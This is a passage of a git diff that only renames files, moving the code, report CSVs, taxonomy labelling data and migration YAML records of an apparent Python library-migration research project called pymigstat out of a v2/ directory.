b/code/pymigstat/complexity/unique_apis.py similarity index 100% rename from v2/code/pymigstat/complexity/unique_apis.py rename to code/pymigstat/complexity/unique_apis.py diff --git a/v2/code/pymigstat/complexity/unique_mappings.py b/code/pymigstat/complexity/unique_mappings.py similarity index 100% rename from v2/code/pymigstat/complexity/unique_mappings.py rename to code/pymigstat/complexity/unique_mappings.py diff --git a/v2/code/pymigstat/config.py b/code/pymigstat/config.py similarity index 100% rename from v2/code/pymigstat/config.py rename to code/pymigstat/config.py diff --git a/v2/code/pymigstat/__init__.py b/code/pymigstat/core/__init__.py similarity index 100% rename from v2/code/pymigstat/__init__.py rename to code/pymigstat/core/__init__.py diff --git a/v2/code/pymigstat/core/import_statement_finder.py b/code/pymigstat/core/import_statement_finder.py similarity index 100% rename from v2/code/pymigstat/core/import_statement_finder.py rename to code/pymigstat/core/import_statement_finder.py diff --git a/v2/code/pymigstat/core/pypi_cache.py b/code/pymigstat/core/pypi_cache.py similarity index 100% rename from v2/code/pymigstat/core/pypi_cache.py rename to code/pymigstat/core/pypi_cache.py diff --git a/v2/code/pymigstat/csv_helper.py b/code/pymigstat/csv_helper.py similarity index 100% rename from v2/code/pymigstat/csv_helper.py rename to code/pymigstat/csv_helper.py diff --git a/v2/code/pymigstat/code_change_search/__init__.py b/code/pymigstat/datamodels/__init__.py similarity index 100% rename from v2/code/pymigstat/code_change_search/__init__.py rename to code/pymigstat/datamodels/__init__.py diff --git a/v2/code/pymigstat/datamodels/api_mapping.py b/code/pymigstat/datamodels/api_mapping.py similarity index 100% rename from v2/code/pymigstat/datamodels/api_mapping.py rename to code/pymigstat/datamodels/api_mapping.py diff --git a/v2/code/pymigstat/datamodels/data_reader.py b/code/pymigstat/datamodels/data_reader.py similarity index 100% rename from v2/code/pymigstat/datamodels/data_reader.py rename to code/pymigstat/datamodels/data_reader.py diff --git a/v2/code/pymigstat/datamodels/datamodel.py b/code/pymigstat/datamodels/datamodel.py similarity index 100% rename from v2/code/pymigstat/datamodels/datamodel.py rename to code/pymigstat/datamodels/datamodel.py diff --git a/v2/code/pymigstat/datamodels/loaders.py b/code/pymigstat/datamodels/loaders.py similarity index 100% rename from v2/code/pymigstat/datamodels/loaders.py rename to code/pymigstat/datamodels/loaders.py diff --git a/v2/code/pymigstat/datamodels/migration.py b/code/pymigstat/datamodels/migration.py similarity index 100% rename from v2/code/pymigstat/datamodels/migration.py rename to code/pymigstat/datamodels/migration.py diff --git a/v2/code/pymigstat/datamodels/storage.py b/code/pymigstat/datamodels/storage.py similarity index 100% rename from v2/code/pymigstat/datamodels/storage.py rename to code/pymigstat/datamodels/storage.py diff --git a/v2/code/pymigstat/core/__init__.py b/code/pymigstat/latex/__init__.py similarity index 100% rename from v2/code/pymigstat/core/__init__.py rename to code/pymigstat/latex/__init__.py diff --git a/v2/code/pymigstat/latex/core.py b/code/pymigstat/latex/core.py similarity index 100% rename from v2/code/pymigstat/latex/core.py rename to code/pymigstat/latex/core.py diff --git a/v2/code/pymigstat/latex/graphics.py b/code/pymigstat/latex/graphics.py similarity index 100% rename from v2/code/pymigstat/latex/graphics.py rename to code/pymigstat/latex/graphics.py diff --git a/v2/code/pymigstat/latex/tables.py b/code/pymigstat/latex/tables.py similarity index 100% rename from v2/code/pymigstat/latex/tables.py rename to code/pymigstat/latex/tables.py diff --git a/v2/code/pymigstat/latex/utils.py b/code/pymigstat/latex/utils.py similarity index 100% rename from v2/code/pymigstat/latex/utils.py rename to code/pymigstat/latex/utils.py diff --git a/v2/code/pymigstat/pymigstat.py b/code/pymigstat/pymigstat.py similarity index 100% rename from v2/code/pymigstat/pymigstat.py rename to code/pymigstat/pymigstat.py diff --git a/v2/code/pymigstat/reports/__init__.py b/code/pymigstat/reports/__init__.py similarity index 100% rename from v2/code/pymigstat/reports/__init__.py rename to code/pymigstat/reports/__init__.py diff --git a/v2/code/pymigstat/reports/api_mapping_data.py b/code/pymigstat/reports/api_mapping_data.py similarity index 100% rename from v2/code/pymigstat/reports/api_mapping_data.py rename to code/pymigstat/reports/api_mapping_data.py diff --git a/v2/code/pymigstat/reports/api_mapping_stats.py b/code/pymigstat/reports/api_mapping_stats.py similarity index 100% rename from v2/code/pymigstat/reports/api_mapping_stats.py rename to code/pymigstat/reports/api_mapping_stats.py diff --git a/v2/code/pymigstat/reports/big_combination_stats.py b/code/pymigstat/reports/big_combination_stats.py similarity index 100% rename from v2/code/pymigstat/reports/big_combination_stats.py rename to code/pymigstat/reports/big_combination_stats.py diff --git a/v2/code/pymigstat/reports/cardinality_stat.py b/code/pymigstat/reports/cardinality_stat.py similarity index 100% rename from v2/code/pymigstat/reports/cardinality_stat.py rename to code/pymigstat/reports/cardinality_stat.py diff --git a/v2/code/pymigstat/reports/code_change_summary.py b/code/pymigstat/reports/code_change_summary.py similarity index 100% rename from v2/code/pymigstat/reports/code_change_summary.py rename to code/pymigstat/reports/code_change_summary.py diff --git a/v2/code/pymigstat/reports/data_stats.py b/code/pymigstat/reports/data_stats.py similarity index 100% rename from v2/code/pymigstat/reports/data_stats.py rename to code/pymigstat/reports/data_stats.py diff --git a/v2/code/pymigstat/reports/export_constant_data.py b/code/pymigstat/reports/export_constant_data.py similarity index 100% rename from v2/code/pymigstat/reports/export_constant_data.py rename to code/pymigstat/reports/export_constant_data.py diff --git a/v2/code/pymigstat/reports/lib_pair_data.py b/code/pymigstat/reports/lib_pair_data.py similarity index 100% rename from v2/code/pymigstat/reports/lib_pair_data.py rename to code/pymigstat/reports/lib_pair_data.py diff --git a/v2/code/pymigstat/reports/lib_pair_stats.py b/code/pymigstat/reports/lib_pair_stats.py similarity index 100% rename from v2/code/pymigstat/reports/lib_pair_stats.py rename to code/pymigstat/reports/lib_pair_stats.py diff --git a/v2/code/pymigstat/reports/mig_effort_stats.py b/code/pymigstat/reports/mig_effort_stats.py similarity index 100% rename from v2/code/pymigstat/reports/mig_effort_stats.py rename to code/pymigstat/reports/mig_effort_stats.py diff --git a/v2/code/pymigstat/reports/migration_summary.py b/code/pymigstat/reports/migration_summary.py similarity index 100% rename from v2/code/pymigstat/reports/migration_summary.py rename to code/pymigstat/reports/migration_summary.py diff --git a/v2/code/pymigstat/reports/misc.py b/code/pymigstat/reports/misc.py similarity index 100% rename from v2/code/pymigstat/reports/misc.py rename to code/pymigstat/reports/misc.py diff --git a/v2/code/pymigstat/reports/signature_change_stat.py b/code/pymigstat/reports/signature_change_stat.py similarity index 100% rename from v2/code/pymigstat/reports/signature_change_stat.py rename to code/pymigstat/reports/signature_change_stat.py diff --git a/v2/code/pymigstat/reports/update_report_data.py b/code/pymigstat/reports/update_report_data.py similarity index 100% rename from v2/code/pymigstat/reports/update_report_data.py rename to code/pymigstat/reports/update_report_data.py diff --git a/v2/code/pymigstat/datamodels/__init__.py b/code/pymigstat/runnables/__init__.py similarity index 100% rename from v2/code/pymigstat/datamodels/__init__.py rename to code/pymigstat/runnables/__init__.py diff --git a/v2/code/pymigstat/runnables/clean_up_data_files.py b/code/pymigstat/runnables/clean_up_data_files.py similarity index 100% rename from v2/code/pymigstat/runnables/clean_up_data_files.py rename to code/pymigstat/runnables/clean_up_data_files.py diff --git a/v2/code/pymigstat/runnables/convert_pymigbench_data.py b/code/pymigstat/runnables/convert_pymigbench_data.py similarity index 100% rename from v2/code/pymigstat/runnables/convert_pymigbench_data.py rename to code/pymigstat/runnables/convert_pymigbench_data.py diff --git a/v2/code/pymigstat/runnables/download_repos.py b/code/pymigstat/runnables/download_repos.py similarity index 100% rename from v2/code/pymigstat/runnables/download_repos.py rename to code/pymigstat/runnables/download_repos.py diff --git a/v2/code/pymigstat/runnables/filter_migration_data.py b/code/pymigstat/runnables/filter_migration_data.py similarity index 100% rename from v2/code/pymigstat/runnables/filter_migration_data.py rename to code/pymigstat/runnables/filter_migration_data.py diff --git a/v2/code/pymigstat/runnables/find_all_code_changes.py b/code/pymigstat/runnables/find_all_code_changes.py similarity index 100% rename from v2/code/pymigstat/runnables/find_all_code_changes.py rename to code/pymigstat/runnables/find_all_code_changes.py diff --git a/v2/code/pymigstat/runnables/sample_migrations_for_code_change_labeling.py b/code/pymigstat/runnables/sample_migrations_for_code_change_labeling.py similarity index 100% rename from v2/code/pymigstat/runnables/sample_migrations_for_code_change_labeling.py rename to code/pymigstat/runnables/sample_migrations_for_code_change_labeling.py diff --git a/v2/code/pymigstat/latex/__init__.py b/code/pymigstat/taxonomy/__init__.py similarity index 100% rename from v2/code/pymigstat/latex/__init__.py rename to code/pymigstat/taxonomy/__init__.py diff --git a/v2/code/pymigstat/taxonomy/agreement_rate.py b/code/pymigstat/taxonomy/agreement_rate.py similarity index 100% rename from v2/code/pymigstat/taxonomy/agreement_rate.py rename to code/pymigstat/taxonomy/agreement_rate.py diff --git a/v2/code/pymigstat/taxonomy/agreement_rate_round_1.py b/code/pymigstat/taxonomy/agreement_rate_round_1.py similarity index 100% rename from v2/code/pymigstat/taxonomy/agreement_rate_round_1.py rename to code/pymigstat/taxonomy/agreement_rate_round_1.py diff --git a/v2/code/pymigstat/taxonomy/combine_rounds.py b/code/pymigstat/taxonomy/combine_rounds.py similarity index 100% rename from v2/code/pymigstat/taxonomy/combine_rounds.py rename to code/pymigstat/taxonomy/combine_rounds.py diff --git a/v2/code/pymigstat/taxonomy/constants.py b/code/pymigstat/taxonomy/constants.py similarity index 100% rename from v2/code/pymigstat/taxonomy/constants.py rename to code/pymigstat/taxonomy/constants.py diff --git a/v2/code/pymigstat/taxonomy/export_yaml.py b/code/pymigstat/taxonomy/export_yaml.py similarity index 100% rename from v2/code/pymigstat/taxonomy/export_yaml.py rename to code/pymigstat/taxonomy/export_yaml.py diff --git a/v2/code/pymigstat/taxonomy/generate_taxonomy.py b/code/pymigstat/taxonomy/generate_taxonomy.py similarity index 100% rename from v2/code/pymigstat/taxonomy/generate_taxonomy.py rename to code/pymigstat/taxonomy/generate_taxonomy.py diff --git a/v2/code/pymigstat/taxonomy/merge_labellings.py b/code/pymigstat/taxonomy/merge_labellings.py similarity index 100% rename from v2/code/pymigstat/taxonomy/merge_labellings.py rename to code/pymigstat/taxonomy/merge_labellings.py diff --git a/v2/code/pymigstat/taxonomy/merge_labellings_round_1.py b/code/pymigstat/taxonomy/merge_labellings_round_1.py similarity index 100% rename from v2/code/pymigstat/taxonomy/merge_labellings_round_1.py rename to code/pymigstat/taxonomy/merge_labellings_round_1.py diff --git a/v2/code/pymigstat/tools/__init__.py b/code/pymigstat/tools/__init__.py similarity index 100% rename from v2/code/pymigstat/tools/__init__.py rename to code/pymigstat/tools/__init__.py diff --git a/v2/code/pymigstat/tools/external_tool.py b/code/pymigstat/tools/external_tool.py similarity index 100% rename from v2/code/pymigstat/tools/external_tool.py rename to code/pymigstat/tools/external_tool.py diff --git a/v2/code/pymigstat/tools/git_repo_wrapper.py b/code/pymigstat/tools/git_repo_wrapper.py similarity index 100% rename from v2/code/pymigstat/tools/git_repo_wrapper.py rename to code/pymigstat/tools/git_repo_wrapper.py diff --git a/v2/code/pymigstat/utils/__init__.py b/code/pymigstat/utils/__init__.py similarity index 100% rename from v2/code/pymigstat/utils/__init__.py rename to code/pymigstat/utils/__init__.py diff --git a/v2/code/pymigstat/utils/gpt_client.py b/code/pymigstat/utils/gpt_client.py similarity index 100% rename from v2/code/pymigstat/utils/gpt_client.py rename to code/pymigstat/utils/gpt_client.py diff --git a/v2/code/pymigstat/utils/progress.py b/code/pymigstat/utils/progress.py similarity index 100% rename from v2/code/pymigstat/utils/progress.py rename to code/pymigstat/utils/progress.py diff --git a/v2/code/pymigstat/utils/utils.py b/code/pymigstat/utils/utils.py similarity index 100% rename from v2/code/pymigstat/utils/utils.py rename to code/pymigstat/utils/utils.py diff --git a/v2/code/report/code-changes.csv b/code/report/code-changes.csv similarity index 100% rename from v2/code/report/code-changes.csv rename to code/report/code-changes.csv diff --git a/v2/code/report/combined-ccs-raw.csv b/code/report/combined-ccs-raw.csv similarity index 100% rename from v2/code/report/combined-ccs-raw.csv rename to code/report/combined-ccs-raw.csv diff --git a/v2/code/report/data-stats.csv b/code/report/data-stats.csv similarity index 100% rename from v2/code/report/data-stats.csv rename to code/report/data-stats.csv diff --git a/v2/code/report/effort.csv b/code/report/effort.csv similarity index 100% rename from v2/code/report/effort.csv rename to code/report/effort.csv diff --git a/v2/code/report/migration-combination--with-fc-groups.csv b/code/report/migration-combination--with-fc-groups.csv similarity index 100% rename from v2/code/report/migration-combination--with-fc-groups.csv rename to code/report/migration-combination--with-fc-groups.csv diff --git a/v2/code/report/migration-combination.csv b/code/report/migration-combination.csv similarity index 100% rename from v2/code/report/migration-combination.csv rename to code/report/migration-combination.csv diff --git a/v2/code/report/migrations.csv b/code/report/migrations.csv similarity index 100% rename from v2/code/report/migrations.csv rename to code/report/migrations.csv diff --git a/v2/code/report/taxonomy-stat-table.csv b/code/report/taxonomy-stat-table.csv similarity index 100% rename from v2/code/report/taxonomy-stat-table.csv rename to code/report/taxonomy-stat-table.csv diff --git a/v2/code/requirements.txt b/code/requirements.txt similarity index 100% rename from v2/code/requirements.txt rename to code/requirements.txt diff --git a/v2/code/taxonomy-data/round1--merge.csv b/code/taxonomy-data/round1--merge.csv similarity index 100% rename from v2/code/taxonomy-data/round1--merge.csv rename to code/taxonomy-data/round1--merge.csv diff --git a/v2/code/taxonomy-data/round1-ajay.csv b/code/taxonomy-data/round1-ajay.csv similarity index 100% rename from v2/code/taxonomy-data/round1-ajay.csv rename to code/taxonomy-data/round1-ajay.csv diff --git a/v2/code/taxonomy-data/round1-ildar.csv b/code/taxonomy-data/round1-ildar.csv similarity index 100% rename from v2/code/taxonomy-data/round1-ildar.csv rename to code/taxonomy-data/round1-ildar.csv diff --git a/v2/code/taxonomy-data/round1-moha.csv b/code/taxonomy-data/round1-moha.csv similarity index 100% rename from v2/code/taxonomy-data/round1-moha.csv rename to code/taxonomy-data/round1-moha.csv diff --git a/v2/code/taxonomy-data/round1-sarah.csv b/code/taxonomy-data/round1-sarah.csv similarity index 100% rename from v2/code/taxonomy-data/round1-sarah.csv rename to code/taxonomy-data/round1-sarah.csv diff --git a/v2/code/taxonomy-data/round2--merge.csv b/code/taxonomy-data/round2--merge.csv similarity index 100% rename from v2/code/taxonomy-data/round2--merge.csv rename to code/taxonomy-data/round2--merge.csv diff --git a/v2/code/taxonomy-data/round2-ajay.csv b/code/taxonomy-data/round2-ajay.csv similarity index 100% rename from v2/code/taxonomy-data/round2-ajay.csv rename to code/taxonomy-data/round2-ajay.csv diff --git a/v2/code/taxonomy-data/round2-ildar.csv b/code/taxonomy-data/round2-ildar.csv similarity index 100% rename from v2/code/taxonomy-data/round2-ildar.csv rename to code/taxonomy-data/round2-ildar.csv diff --git a/v2/code/taxonomy-data/round2-moha.csv b/code/taxonomy-data/round2-moha.csv similarity index 100% rename from v2/code/taxonomy-data/round2-moha.csv rename to code/taxonomy-data/round2-moha.csv diff --git a/v2/code/taxonomy-data/round2-sarah.csv b/code/taxonomy-data/round2-sarah.csv similarity index 100% rename from v2/code/taxonomy-data/round2-sarah.csv rename to code/taxonomy-data/round2-sarah.csv diff --git a/v2/code/taxonomy-data/round3--merge.csv b/code/taxonomy-data/round3--merge.csv similarity index 100% rename from v2/code/taxonomy-data/round3--merge.csv rename to code/taxonomy-data/round3--merge.csv diff --git a/v2/code/taxonomy-data/round3-ajay.csv b/code/taxonomy-data/round3-ajay.csv similarity index 100% rename from v2/code/taxonomy-data/round3-ajay.csv rename to code/taxonomy-data/round3-ajay.csv diff --git a/v2/code/taxonomy-data/round3-ildar.csv b/code/taxonomy-data/round3-ildar.csv similarity index 100% rename from v2/code/taxonomy-data/round3-ildar.csv rename to code/taxonomy-data/round3-ildar.csv diff --git a/v2/code/taxonomy-data/round3-moha.csv b/code/taxonomy-data/round3-moha.csv similarity index 100% rename from v2/code/taxonomy-data/round3-moha.csv rename to code/taxonomy-data/round3-moha.csv diff --git a/v2/code/taxonomy-data/round3-sarah.csv b/code/taxonomy-data/round3-sarah.csv similarity index 100% rename from v2/code/taxonomy-data/round3-sarah.csv rename to code/taxonomy-data/round3-sarah.csv diff --git a/v2/data/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml b/data/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml similarity index 100% rename from v2/data/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml rename to data/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml diff --git a/v2/data/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml b/data/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml similarity index 100% rename from v2/data/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml rename to data/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml diff --git a/v2/data/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml b/data/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml similarity index 100% rename from v2/data/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml rename to data/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml diff --git a/v2/data/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml b/data/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml similarity index 100% rename from v2/data/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml rename to data/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml diff --git a/v2/data/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml b/data/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml similarity index 100% rename from v2/data/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml rename to data/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml diff --git a/v2/data/migration/argparse__click__amesar@mlflow-tools__431737a.yaml b/data/migration/argparse__click__amesar@mlflow-tools__431737a.yaml similarity index 100% rename from v2/data/migration/argparse__click__amesar@mlflow-tools__431737a.yaml rename to data/migration/argparse__click__amesar@mlflow-tools__431737a.yaml diff --git a/v2/data/migration/argparse__click__ansible-community@molecule__b7d7740.yaml b/data/migration/argparse__click__ansible-community@molecule__b7d7740.yaml similarity index 100% rename from v2/data/migration/argparse__click__ansible-community@molecule__b7d7740.yaml rename to data/migration/argparse__click__ansible-community@molecule__b7d7740.yaml diff --git a/v2/data/migration/argparse__click__clearmatics@ion__03fb3a3.yaml b/data/migration/argparse__click__clearmatics@ion__03fb3a3.yaml similarity index 100% rename from v2/data/migration/argparse__click__clearmatics@ion__03fb3a3.yaml rename to data/migration/argparse__click__clearmatics@ion__03fb3a3.yaml diff --git a/v2/data/migration/argparse__click__godaddy@tartufo__553dc5f.yaml b/data/migration/argparse__click__godaddy@tartufo__553dc5f.yaml similarity index 100% rename from v2/data/migration/argparse__click__godaddy@tartufo__553dc5f.yaml rename to data/migration/argparse__click__godaddy@tartufo__553dc5f.yaml diff --git a/v2/data/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml b/data/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml similarity index 100% rename from v2/data/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml rename to data/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml diff --git a/v2/data/migration/argparse__click__grahame@sedge__3badf07.yaml b/data/migration/argparse__click__grahame@sedge__3badf07.yaml similarity index 100% rename from v2/data/migration/argparse__click__grahame@sedge__3badf07.yaml rename to data/migration/argparse__click__grahame@sedge__3badf07.yaml diff --git a/v2/data/migration/argparse__click__himkt@pyner__76106a9.yaml b/data/migration/argparse__click__himkt@pyner__76106a9.yaml similarity index 100% rename from v2/data/migration/argparse__click__himkt@pyner__76106a9.yaml rename to data/migration/argparse__click__himkt@pyner__76106a9.yaml diff --git a/v2/data/migration/argparse__click__klensy@wt-tools__760ff36.yaml b/data/migration/argparse__click__klensy@wt-tools__760ff36.yaml similarity index 100% rename from v2/data/migration/argparse__click__klensy@wt-tools__760ff36.yaml rename to data/migration/argparse__click__klensy@wt-tools__760ff36.yaml diff --git a/v2/data/migration/argparse__click__kxr@o-must-gather__9da4722.yaml b/data/migration/argparse__click__kxr@o-must-gather__9da4722.yaml similarity index 100% rename from v2/data/migration/argparse__click__kxr@o-must-gather__9da4722.yaml rename to data/migration/argparse__click__kxr@o-must-gather__9da4722.yaml diff --git a/v2/data/migration/argparse__click__lqez@hog__d722ade.yaml b/data/migration/argparse__click__lqez@hog__d722ade.yaml similarity index 100% rename from v2/data/migration/argparse__click__lqez@hog__d722ade.yaml rename to data/migration/argparse__click__lqez@hog__d722ade.yaml diff --git a/v2/data/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml b/data/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml similarity index 100% rename from v2/data/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml rename to data/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml diff --git a/v2/data/migration/argparse__click__martinthoma@hwrt__86bc433.yaml b/data/migration/argparse__click__martinthoma@hwrt__86bc433.yaml similarity index 100% rename from v2/data/migration/argparse__click__martinthoma@hwrt__86bc433.yaml rename to data/migration/argparse__click__martinthoma@hwrt__86bc433.yaml diff --git a/v2/data/migration/argparse__click__oca@maintainer-tools__69593ae.yaml b/data/migration/argparse__click__oca@maintainer-tools__69593ae.yaml similarity index 100% rename from v2/data/migration/argparse__click__oca@maintainer-tools__69593ae.yaml rename to data/migration/argparse__click__oca@maintainer-tools__69593ae.yaml diff --git a/v2/data/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml b/data/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml similarity index 100% rename from v2/data/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml rename to data/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml diff --git a/v2/data/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml b/data/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml similarity index 100% rename from v2/data/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml rename to data/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml diff --git a/v2/data/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml b/data/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml similarity index 100% rename from v2/data/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml rename to data/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml diff --git a/v2/data/migration/argparse__docopt__ceph@teuthology__fb32105.yaml b/data/migration/argparse__docopt__ceph@teuthology__fb32105.yaml similarity index 100% rename from v2/data/migration/argparse__docopt__ceph@teuthology__fb32105.yaml rename to data/migration/argparse__docopt__ceph@teuthology__fb32105.yaml diff --git a/v2/data/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml b/data/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml similarity index 100% rename from v2/data/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml rename to data/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml diff --git a/v2/data/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml b/data/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml similarity index 100% rename from v2/data/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml rename to data/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml diff --git a/v2/data/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml b/data/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml similarity index 100% rename from v2/data/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml rename to data/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml diff --git a/v2/data/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml b/data/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml similarity index 100% rename from v2/data/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml rename to data/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml diff --git a/v2/data/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml b/data/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml similarity index 100% rename from v2/data/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml rename to data/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml diff --git a/v2/data/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml b/data/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml similarity index 100% rename from v2/data/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml rename to data/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml diff --git a/v2/data/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml b/data/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml similarity index 100% rename from v2/data/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml rename to data/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml diff --git a/v2/data/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml b/data/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml similarity index 100% rename from v2/data/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml rename to data/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml diff --git a/v2/data/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml b/data/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml similarity index 100% rename from v2/data/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml rename to data/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml diff --git a/v2/data/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml b/data/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml similarity index 100% rename from v2/data/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml rename to data/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml diff --git a/v2/data/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml b/data/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml similarity index 100% rename from v2/data/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml rename to data/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml diff --git a/v2/data/migration/botocore__boto__zalando@spilo__a83681c.yaml b/data/migration/botocore__boto__zalando@spilo__a83681c.yaml similarity index 100% rename from v2/data/migration/botocore__boto__zalando@spilo__a83681c.yaml rename to data/migration/botocore__boto__zalando@spilo__a83681c.yaml diff --git a/v2/data/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml b/data/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml similarity index 100% rename from v2/data/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml rename to data/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml diff --git a/v2/data/migration/bottle__flask__heyman@locust__4067b92.yaml b/data/migration/bottle__flask__heyman@locust__4067b92.yaml similarity index 100% rename from v2/data/migration/bottle__flask__heyman@locust__4067b92.yaml rename to data/migration/bottle__flask__heyman@locust__4067b92.yaml diff --git a/v2/data/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml b/data/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml similarity index 100% rename from v2/data/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml rename to data/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml diff --git a/v2/data/migration/bunch__munch__1and1@confluencer__df895ac.yaml b/data/migration/bunch__munch__1and1@confluencer__df895ac.yaml similarity index 100% rename from v2/data/migration/bunch__munch__1and1@confluencer__df895ac.yaml rename to data/migration/bunch__munch__1and1@confluencer__df895ac.yaml diff --git a/v2/data/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml b/data/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml similarity index 100% rename from v2/data/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml rename to data/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml diff --git a/v2/data/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml b/data/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml similarity index 100% rename from v2/data/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml rename to data/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml diff --git a/v2/data/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml b/data/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml similarity index 100% rename from v2/data/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml rename to data/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml diff --git a/v2/data/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml b/data/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml similarity index 100% rename from v2/data/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml rename to data/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml diff --git a/v2/data/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml b/data/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml similarity index 100% rename from v2/data/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml rename to data/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml diff --git a/v2/data/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml 